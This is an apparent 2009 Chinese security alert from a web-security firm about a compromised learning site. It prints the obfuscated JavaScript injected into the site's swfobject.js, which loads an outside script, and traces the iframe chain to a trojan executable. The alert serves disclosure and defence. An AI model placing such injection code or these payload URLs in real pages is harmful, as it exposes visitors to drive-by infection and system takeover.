发布时间:Thu Apr 30 2009 17:10:55 UTC+0800
最后更新时间:Thu Apr 30 2009 17:10:55 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国菜鸟学习基地(http://www.cainwo.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.cainwo.cn/images/default/swfobject.js
网页被嵌入恶意链接代码:
document.write(eval(unescape(”%27%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%61%69%6c%27%2b%27%69%6c%61%2e%63%6e%2f%63%6c%69%63%6b%2e%70%68%70%3e%3c%2f%73%63%72%27%2b%27%69%70%74%3e%27″)));
挂马分析:
[wide]http://www.cainwo.cn/
[script]http://www.cainwo.cn/images/default/swfobject.js
[script]http://ailila.cn/click.php
[frame]http://ainikv.cn/07/07.htm
[frame]http://ainikv.cn/07/ytqm.htm
[script]http://ainikv.cn/07/js.js
[frame]http://ainikv.cn/07/yt14.htm
[frame]http://ainikv.cn/07/ytfl.htm
[frame]http://ainikv.cn/07/ytff.htm
[frame]http://ainikv.cn/07/ytvod.htm
[frame]http://ainikv.cn/07/ytxxz.htm
[frame]http://ainikv.cn/07/ytbf.htm
[frame]http://ainikv.cn/07/yt122121.htm
[script]http://js.tongji.cn.yahoo.com/963243/ystat.js
[script]http://js.tongji.cn.yahoo.com/902019/ystat.js
[script]http://js.tongji.cn.yahoo.com/865359/ystat.js
最终下载病毒文件:
http://ainikv.cn/07/07.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇:专业的WEB安全公司 www.knownsec.com
Popularity: 6% [?]
